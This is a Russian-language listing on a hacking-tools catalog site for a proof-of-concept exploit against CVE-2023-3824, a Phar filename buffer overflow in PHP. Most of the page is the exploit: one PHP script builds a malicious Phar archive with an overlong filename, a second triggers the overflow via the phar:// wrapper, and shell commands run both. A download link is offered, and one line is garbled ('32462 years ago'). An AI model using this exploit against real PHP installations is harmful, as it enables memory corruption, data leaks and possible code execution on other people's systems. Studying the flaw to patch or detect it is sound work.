Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-3824 — Уязвимость в PHP-файлах Phar, вызванная переполнением буфера, возникает из-за недостаточной проверки длины имён файлов внутри Phar-архива. Злоумышленники могут создавать Phar-файлы с длинными именами файлов, что приводит к переполнению буфера и потенциальному выполнению вредоносного кода или утечке данных. Эта уязвимость может быть использована для выполнения кода — CVE-2023-3824 | Kitploit
Инструменты/GitHubGitHub/jhonnybonny/cve-2023-3824
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubjhonnybonny/cve-2023-3824

CVE-2023-3824

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
32462 лет назадЕщё не проверено

Описание

Уязвимость в PHP-файлах Phar, вызванная переполнением буфера, возникает из-за недостаточной проверки длины имён файлов внутри Phar-архива. Злоумышленники могут создавать Phar-файлы с длинными именами файлов, что приводит к переполнению буфера и потенциальному выполнению вредоносного кода или утечке данных. Эта уязвимость может быть использована для выполнения кода — CVE-2023-3824

Поделиться

PHP PoC вредоносного Phar-файла (CVE-2023-3824)

Описание

Этот PoC демонстрирует, как создать вредоносный Phar-файл в PHP и вызвать уязвимость переполнения буфера.

Использование

Создание вредоносного Phar-файла

  1. Создайте новый PHP-файл (например, create_phar.php) и добавьте следующий код:
root@kitploit:~
<?php
$phar = new Phar('malicious.phar');
$phar->startBuffering();
$phar->addFromString(str_repeat('A', PHP_MAXPATHLEN - 1).'B', 'This is the content of the file.');
$phar->stopBuffering();
?>

Выполните PHP-скрипт, чтобы создать вредоносный Phar-файл: Копировать код

root@kitploit:~
php create_phar.php

Запуск переполнения буфера

Создайте ещё один PHP-файл (например, trigger_overflow.php) и добавьте следующий код:

root@kitploit:~
<?php
$handle = opendir("phar://./malicious.phar");
$x = readdir($handle);
closedir($handle);

var_dump($x);
?>

Выполните PHP-скрипт, чтобы вызвать переполнение буфера: Копировать код php trigger_overflow.php Оператор var_dump($x) выведет результат переполнения буфера и операции чтения за пределами буфера.

Скачать инструмент